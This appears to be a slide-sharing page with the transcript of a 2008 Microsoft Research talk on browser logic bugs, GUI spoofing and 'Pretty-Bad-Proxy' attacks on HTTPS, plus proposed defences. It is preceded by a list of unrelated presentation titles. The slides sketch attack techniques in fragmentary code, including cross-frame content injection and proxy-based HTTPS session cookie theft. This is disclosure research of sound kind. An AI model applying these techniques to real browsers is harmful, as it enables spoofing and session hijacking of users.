1 Shuo Chen ISRC, MSR March 2008. 2 Browser security is still very broad. I usually differentiate three types of issues – their causes and potential solutions.

Slides:

Advertisements

Similar presentations

1 IEEE Symposium on Security and Privacy, May 2009 Shuo Chen, Ziqing Mao, Yi-Min Wang, Ming Zhang Microsoft Research Purdue University May 20 th, 2009.

Advertisements

Presented by Vaibhav Rastogi. Current browsers try to separate host system from Web Websites evolved into web applications Lot of private data on the.

WEB AND WIRELESS AUTOMATION connecting people and processes InduSoft Web Solution Welcome.

Mobile Code Security Yurii Kuzmin. What is Mobile Code? Term used to describe general-purpose executables that run in remote locations. Web browsers come.

Chapter 17: WEB COMPONENTS

Copyright © 2012 Certification Partners, LLC -- All Rights Reserved Lesson 4: Web Browsing.

How the Internet Works Course Objectives Introduce the various web browsers Introduce some new terms Explain the basic Internet to PC hookup  ISP  Wired.

17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.

An Evaluation of the Google Chrome Extension Security Architecture

1 14th ACM Conference on Computer and Communications Security, Alexandria, VA Shuo Chen †, David Ross ‡, Yi-Min Wang † † Internet Services Research Center.

Lesson 4: Web Browsing.

Secure web browsers, malicious hardware, and hardware support for binary translation Sam King.

Dynamic Pharming Attacks and Locked Same-Origin Policies For Web Browsers Chris Karlof, J.D. Tygar, David Wagner, Umesh Shankar.

Network Isolation Using Group Policy and IPSec Paula Kiernan Senior Consultant Ward Solutions.

The Most Dangerous Code in the Browser Stefan Heule, Devon Rifkin, Alejandro Russo, Deian Stefan Stanford University, Chalmers University of Technology.

Privacy and Security on the Web Part 1. Agenda Questions? Stories? Questions? Stories? IRB: I will review and hopefully send tomorrow. IRB: I will review.

CS 290C: Formal Models for Web Software Lecture 10: Language Based Modeling and Analysis of Navigation Errors Instructor: Tevfik Bultan.

INTERNET DATABASE Chapter 9. u Basics of Internet, Web, HTTP, HTML, URLs. u Advantages and disadvantages of Web as a database platform. u Approaches for.

Towards Application Security On Untrusted OS

Computer Security and Penetration Testing

 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.

The Internet & The World Wide Web Notes

Secure Remote Access to an Internal Web Server Christian Gilmore, David Kormann, and Aviel D. Rubin ATT Labs - Research “The security policy usually amounts.

Quick Tour of the Web Technologies: The BIG picture LECTURE A bird’s eye view of the different web technologies that we shall explore and study.

1 Subspace: Secure Cross Domain Communication for Web Mashups Collin Jackson and Helen J. Wang Mamadou H. Diallo.

Subspace: Secure Cross-Domain Communication for Web Mashups Collin Jackson Stanford University Helen J. Wang Microsoft Research ACM WWW, May, 2007 Presenter:

Subspace: Secure Cross-Domain Communication for Web Mashups In Proceedings of the 16th International World Wide Web Conference. (WWW), 2007 Collin Jackson,

1 Web Database Processing. Web Database Applications Static Report Publishing a report is prepared from a database application and exported to HTML DB.

CSCI 323 – Web Development Chapter 1 - Setting the Scene We’re going to move through the first few chapters pretty quick since they are a review for most.

FORESEC Academy FORESEC Academy Security Essentials (II)

IT 210 The Internet & World Wide Web introduction.

Copyright © cs-tutorial.com. Introduction to Web Development In 1990 and 1991,Tim Berners-Lee created the World Wide Web at the European Laboratory for.

Principles of Computer Security: CompTIA Security + ® and Beyond, Third Edition © 2012 Principles of Computer Security: CompTIA Security+ ® and Beyond,

Principles of Computer Security: CompTIA Security + ® and Beyond, Second Edition © 2010 Web Components Chapter 17.

Chapter 4: Core Web Technologies

Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.

ES Module 5 Uniform Resource Locators, Hypertext Transfer Protocol, & Common Gateway Interface.

JavaScript, Fourth Edition

November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University

1 Apache. 2 Module - Apache ♦ Overview This module focuses on configuring and customizing Apache web server. Apache is a commonly used Hypertext Transfer.

1 CHAPTER 2 LAWS OF SECURITY. 2 What Are the Laws of Security Client side security doesn’t work Client side security doesn’t work You can’t exchange encryption.

CSCE 201 Web Browser Security Fall CSCE Farkas2 Web Evolution Web Evolution Past: Human usage – HTTP – Static Web pages (HTML) Current: Human.

1 FAQ’S ABOUT WAP Presented By Abhilash Pillai CSCI 5939-Independent Study.

Grid Chemistry System Architecture Overview Akylbek Zhumabayev.

1 Topic 2: Lesson 3 Intro to Firewalls Summary. 2 Basic questions What is a firewall? What is a firewall? What can a firewall do? What can a firewall.

Overview Web Session 3 Matakuliah: Web Database Tahun: 2008.

INTRODUCTION TO WEB APPLICATION Chapter 1. In this chapter, you will learn about:  The evolution of the Internet  The beginning of the World Wide Web,

5/21/2007 IEEE Symposium on Security and Privacy, Oakland, CA A Systematic Approach to Uncover Security Flaws in GUI Logic Shuo Chen †, José Meseguer ‡,

Lecture 16 Page 1 CS 236 Online Web Security CS 236 On-Line MS Program Networks and Systems Security Peter Reiher.

COSC 513 Operating Systems Project Presentation: Internet Security Instructor: Dr. Anvari Student: Ying Zhou Spring 2003.

THE DEVIL IS IN THE (IMPLEMENTATION) DETAILS: AN EMPIRICAL ANALYSIS OF OAUTH SSO SYSTEMS SAN-TSAI SUN & KONSTANTIN BEZNOSOV PRESENTED BY: NAZISH KHAN COMPSCI.

Web Pages with Features. Features on Web Pages Interactive Pages –Shows current date, get server’s IP, interactive quizzes Processing Forms –Serach a.

1 3 Computing System Fundamentals 3.4 Networked Computer Systems.

Principles of Computer Security: CompTIA Security + ® and Beyond, Third Edition © 2012 Principles of Computer Security: CompTIA Security+ ® and Beyond,

2007cs Servers on the Web. The World-Wide Web 2007 cs CSS JS HTML Server Browser JS CSS HTML Transfer of resources using HTTP.

Vaibhav Rastogi and Yi Yang.  SOP is outdated  Netscape introduced this policy when most content on the Internet was static  Differences amongst different.

Protecting Browsers from Extension Vulnerabilities Paper by: Adam Barth, Adrienne Porter Felt, Prateek Saxena at University of California, Berkeley and.

1 Isolating Web Programs in Modern Browser Architectures CS6204: Cloud Environment Spring 2011.

Website Design, Development and Maintenance ONLY TAKE DOWN NOTES ON INDICATED SLIDES.

Web Application (In)security Note: Unless noted differently, all scanned figures were from the textbook, Stuttard & Pinto, 2011.

Introduction to the World Wide Web & Internet CIS 101.

A Systematic Approach to Uncover Security Flaws in GUI Logic Distributed Multimedia Computing Lab. Minjae Cho

MIS Week 5 Site:

Shuo Chen Microsoft Research One Microsoft Way David Ross Security Technology Unit, Microsoft One Microsoft Way Yi-Min Wang Microsoft Research One Microsoft.

Tonga Institute of Higher Education IT 141: Information Systems

Lesson 4: Web Browsing.

Processes The most important processes used in Web-based systems and their internal organization.

Tonga Institute of Higher Education IT 141: Information Systems

Tonga Institute of Higher Education IT 141: Information Systems

Lesson 4: Web Browsing.

Presentation transcript:

1 Shuo Chen ISRC, MSR March 2008

2 Browser security is still very broad. I usually differentiate three types of issues – their causes and potential solutions are different. Browser security issues Logic bugs Usability and understandability issues Over-permissive high-level policies

3 Logic bugs exist at every layer in the browser architecture. (Everything you depend on is buggy) GUI layer E.g., logic bugs may result in visual spoofing HTML and Jscript layer E.g., cross-domain access due to logic bugs in the domain isolation mechanism Communication layer: E.g., Logic bugs that allow any device that can sniff browser traffic to break the protection of HTTPS. (Our recent work “pretty-bad-proxy”)

4 The violated security policies are fairly basic and look simple, e.g., The address bar URL should be the URL of the top level document; When mouseover a static hyperlink, the status bar should display the target URL; A script in a.com context cannot access a document in b.com context However, an important lesson I learned in browser security research is: Implementing correct logic to achieve even the most basic security requirements in browsers is challenging The challenges are likely to be understated if we haven’t carefully studied these bugs.

5 Why logic correctness is challenging in browsers? A commodity browser is so complex that no human brain power can verify its correctness with high confidence. Most are tricky bugs. Very few “stupid” ones.

6 Even seemingly simple policies are difficult to securely enforce, due to logic complexity.

7

8 w1=open(" s1 = a string containing unprintable characters; w1.location=" w1.document.write("arbitrary contents!"); Navigate to  The frame is ready for  Arbitrary contents written to the frame Navigation is not transactional. Can be aborted in unsafe states. (Fixed in February 2008)

9 c:\windows\system32\shdoclc.dl l?http History back Load a new page Two frames competing. 50:50 chance to go out-of- sync with the address bar. Fixed in before IE 7 was shipped

10

11 Cryptographic protocols: designed to provide secure communications over insecure networks. E.g, HTTPS Our curiosity: is the same adversary model rigorously considered when people deploy the protocols in browser/web systems. We assume the Pretty-Bad-Proxy adversary model It is an HTTP proxy that completely controls unencrypted traffic, but cannot break the cryptography between the browser and the server.

12 HTML Engine (browser security model) SSL TCP/IP browser PBP (the bad guy) server Encrypted traffic Unencrypted traffic, accessible by PBP Faked data

13 We found that a PBP can compromise HTTPS- deployed applications in many ways Proxy’s malicious error responses Proxy redirecting javascript requests Proxy loading HTTP javascript into HTTPS context Proxy making the browser to display cached certificate with bogus page contents. Proxy stealing HTTPS session cookies using HTTP requests.

14 <iframe src= “ Proxy’s error pages are rendered in the context of the target server. browser PBP server Server not found

15 When you stay in a hotel or in an Internet café When you connect to a free wireless access point on a bus. When you use a third-party free anonymizer (an HTTP proxy) When the proxy of the corpnet is hacked by an insider or accidentally infected by a virus. Don’t trust HTTPS in these scenarios, although HTTPS is supposed to protect you against untrusted proxies.

16 It is turned on by default. You don’t have to connect to an untrusted proxy intentionally. Attackers can do that for you easily. Wireless access point (unencrypted or WEP) Sniffing on Ethernet. A device that can sniff the traffic can break HTTPS communications. No security at all.

17 Microsoft has notified other affected browser vendors (Firefox, Opera). They acknowledged the issues. Microsoft has fixed IE bugs in IE 8 Beta 1, waiting to evaluate compatibility impact before shipping patches for down-level IEs. Opera has fixed their bugs in December Firefox acknowledged these issues and planned to fix. We are waiting for the resolution of these issues in order to submit the paper.

18

19 It is almost impossible for developers to anticipate the possibilities of security attacks, because: Tight interactions with other components, e.g., file system, XML, Flash, etc. Non-transactional: no guarantee of fail-safe. Concurrancy: possibility of race conditions Inter-page scripting is conditionally permitted. A platform rendering rich contents, e.g., HTML and Jscript. (compare to Telnet, FTP or SSH)

20 (1) Formal reasoning If the code logic can be modeled and the high-level security specification can be formally defined, we can use formal methods to explore the logic combinations to prove or disprove the specification. We proposed this approach to reason about IE’s GUI logic (2) Runtime enforcement of interface invariants If the internal logic of a module is too complex to model, we enforce invariants of its interfaces. We proposed this approach to defeat cross-domain attacks.

21 Goal: to apply formal methods to reason about GUI logic in order to proactively uncover visual spoofing bugs. Examined the status bar logic and the address bar logic. Found 13 spoofing bugs, 11 of them were fixed before IE 7 was shipped.

22 In human languages, accent is essentially an identifier of a person’s origin that is carried in communications Script accenting Each domain is associated with an “accent key”. Scripts and HTML object names are encoded in their accented forms at the interface between the script engine and the HTML engine. Scripts won’t be compiled and executed in a different domain because of accent mismatch.

23

24 Browser logic correctness is a critical component in web security Because of the complexity, to ensure logic correctness is challenging. Combinations of low-level behaviors violate high-level security policies. Do not understate the challenges Security policies often look fairly simple Difficult to see the challenges without in-depth investigations on real-world bugs.

25 New research opportunities More effort should be spent simply to understand logic bugs better Propose solutions based on the understanding. It’s fun To probe the logic and piece together your knowledge; try to do something that most people thought impossible …

26 Collaborators Ziqing Mao (Purdue, Security, Intern) Jose Meseguer (UIUC, formal methods) David Ross (MS, Security Tech Unit) Ralf Sasse (UIUC, formal methods, Intern) Helen J. Wang (MSR, Security) Yi-Min Wang (MSR, Internet Services) Ming Zhang (MSR, Networking)